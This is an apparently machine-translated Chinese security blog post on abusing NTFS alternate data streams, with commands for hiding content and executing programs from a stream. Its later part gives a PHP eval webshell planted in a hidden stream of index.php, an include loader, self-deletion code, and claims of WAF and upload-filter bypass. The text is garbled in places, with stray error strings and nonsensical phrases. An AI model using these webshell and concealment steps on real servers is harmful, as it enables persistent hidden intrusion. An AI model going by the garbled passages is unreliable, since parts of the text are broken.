文件寄生——寻找宿主的不归路(NTFS文件流实际应用)

NTFS文件系统实现了多文件流特性,NTFS环境一个文件默认使用的是未命名的文件流,同时可创建其他命名的文件流,windows资源管理器默认不显示出文件的命名文件流,这些命名的文件流在功能上和默认使用…

从对等方接收数据时失败 3.包含隐藏信息的文件仍可以继续隐藏其他内容。与上面的示例相反,我们仍然可以使用命令echo mstlab1>> mst.txt: test1.txt为mst.txt创建一个新的隐藏流文件。命令notepad mst.txt: test1.txt将在打开后找到mstlab1信息,mstlab仍然存在于mst.txt: test.txt不受影响。

所以这里的主机mst.txt被test.txt和test1.txt成功寄生,这里的微妙关系很明显,主机消失,寄生物消失。 NTFS特点和原理分析: 特色1: 实验室工具下载:https://github.com/wangyongxina/filestreams/blob/master/Release/Release.7z 工具说明: 创建创建文件流 枚举枚举文件流 删除删除文件流 Write将内容写入文件流 将添加文件附加到文件流 启动文件流的内容 转储读取文件流的内容 让我们将上一步回到零并重新访问mst.txt:

此处的默认文件流验证第一个句子,默认为使用指定的文件流。 在实验开始时,首先我们使用FileStreams.exe创建一个文件流vkey: FileStreams.exe创建mst.txt vkey

然后将内容写入文件流vkey: FileStreams.exe写入mst.txt vkey内容

然后看一下文件流vkey的内容: FileStreams.exe dump mst.txt vkey 14 14这里来自哪里,我相信你可以理解聪明。 (文件流vkey大小14)

所以在一开始,文件流可以用来启动程序,让我们试试: 1.将文件添加到文件流vkey: FileStreams.exe追加mst.txt vkey C: \ Users \ gh0stkey \ Desktop \ test \ FileStreams.exe

2.查看文件流vkey的内容,这里看前100个字节的内容: FileStreams.exe dump mst.txt vkey 100

3.执行文件流vkey:

文件C: \ Users \ gh0stkey \ Desktop \ test \ FileStreams.exe已成功执行。 特色2 自动创建空文件:

主机自动创建,然后寄生。 在没有原始文件的情况下创建文件流会自动创建一个空文件。 原理分析: 好的,现在我们初步了解了文件流的特性。我们来看看NTFS文件流的实现原理: 如文件大小,文件创建时间,文件修改时间,文件名,文件内容等都被组织成要存储的属性,NTFS定义了一系列文件属性:

从对等方接收数据时失败 Exec('echo'<php @eval($ _ POST [key]);>'>> index.php: key.php'); 直接写一个句子到key.php的文件流。 其次,文件流不能直接执行,但PHP可以使用include函数,因此生成第二段代码: $ key=<<< key Echo'<php包括'index.php: key.php';>'>> a.php 键; EXEC($键); 最后,为了找不到删除文件本身,代码出来了: $ url=$ _SERVER ['PHP_SELF']; $ filename=substr($ url,strrpos($ url,'/')+ 1); @unlink($文件名); 软件后门隐藏: 使用功能1编写一段代码以在后台自动运行此文件流。 ByPass WAF: 测试下一个WAF仍然可以被绕过。 更多鸡肉:

需要包含一个文件。 当然,一些限制限制寄生虫获得主权: 使用下面的默认流替换功能上传名为1.php:的文件,绕过后缀名称限制。 默认流替换: 默认流也是主机自己的,可以完全吞噬主机并成为主机。 这种方法是常规的理解,非常有趣。

如上所示,我们直接执行echo xxxx>> 1.txt: 您可以替换默认流:

当然,如果主机不存在,将创建主机并且主机将被吞没以成为主机。 此方法完美地用于有限的命令执行。 总结一下 原始文件=主机,文件流=寄生虫。亲爱的朋友们,在本文的基础上,继续深入研究,将文件流应用于各种操作,并创建一个“古怪”的流。 本文《文件寄生——寻找宿主的不归路(NTFS文件流实际应用)”》由作者Mister Security进攻与防御实验室Www.Hi-OurLife.Com @ gh0stkey原创贡献安全脉冲,安全脉冲发表本文,如需转载,请联系安全脉冲授权;请不要擅自转载。